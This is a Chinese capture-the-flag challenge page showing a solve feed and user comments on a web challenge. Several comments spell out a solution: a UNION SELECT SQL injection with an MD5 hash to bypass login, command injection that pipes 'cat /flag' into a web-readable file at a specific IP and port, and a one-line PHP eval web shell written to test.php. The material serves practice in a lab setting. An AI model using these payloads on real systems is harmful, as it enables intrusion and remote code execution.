评分(10)
解题动态
277445839 攻破了该题 2小时前
Ym1ng 攻破了该题 2小时前
小熊 攻破了该题 18小时前
1302074808 攻破了该题 21小时前
e13gance 攻破了该题 1天前
cc131 攻破了该题 1天前
dabinzi 攻破了该题 1天前
betaaa 攻破了该题 2天前
不会Reverse的玖 攻破了该题 2天前
喜樂乐 攻破了该题 2天前
sunyq 攻破了该题 2天前
xuyuyan999 攻破了该题 4天前
anton_小金鱼 攻破了该题 4天前
zuaiyio 攻破了该题 4天前
1166 攻破了该题 4天前
提姆邓肯 攻破了该题 5天前
不想吃肥肉 攻破了该题 5天前
xym 攻破了该题 5天前
BugKuYali 攻破了该题 5天前
评论
qq1002517 2月前
举报
flag{******}
5883120xly 5月前
举报
username= ' UNION SELECT '任意用户名', 'fae0b27c451c728867a567e8c1bb4e53' -- password=666 进入命令执行界面输入 666 | cat /flag >2.txt 访问http://117.72.52.127:14324/2.txt即可
你文博哥哥 7月前
举报
首先爆破,没出来,sqlmap扫了,账号密码为空,丫的,没法去找有用信息,源码,请求头,都没,最后在返回包找到了tip,解码,得到注入点,username输入admin'union select 1,md5(123)#&password(123),得到监控系统,然后看见输入框,想到了rce,然后尝试输入1,然后输入ls /,没回显,被过滤,后面利用tee命令,将查找写入新文件,访问即可
一个姓⎝李⎠的师傅~ 7月前
举报
做了 3 个小时,完整记录了自己的 25 个步骤,sqlmap 省略了因为没有可用信息! 来看看吧,肯定会对你有帮助,联合注入的发现,命令执行写入文件绕过没有网页回显命令内容的办法,包括路径的讲解: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#zIr77
꧁༺༽༾ཊCCཏ༿༼༻꧂ 7月前
举报
没难度
六分之杰 8月前
举报
https://zhuanlan.zhihu.com/p/7343164566
D调丶Slayer 8月前
举报
https://blog.csdn.net/weixin_58111246/article/details/123482301?spm=1001.2014.3001.5501
19957910119 8月前
举报
1&&echo '<?php @eval($_POST['shell']);phpinfo();?>'>test.php
ctfer-pls 9月前
举报
看了评论厉害了
ilovevicky99 9月前
举报
用反弹shell的方法,为什么没有回显呀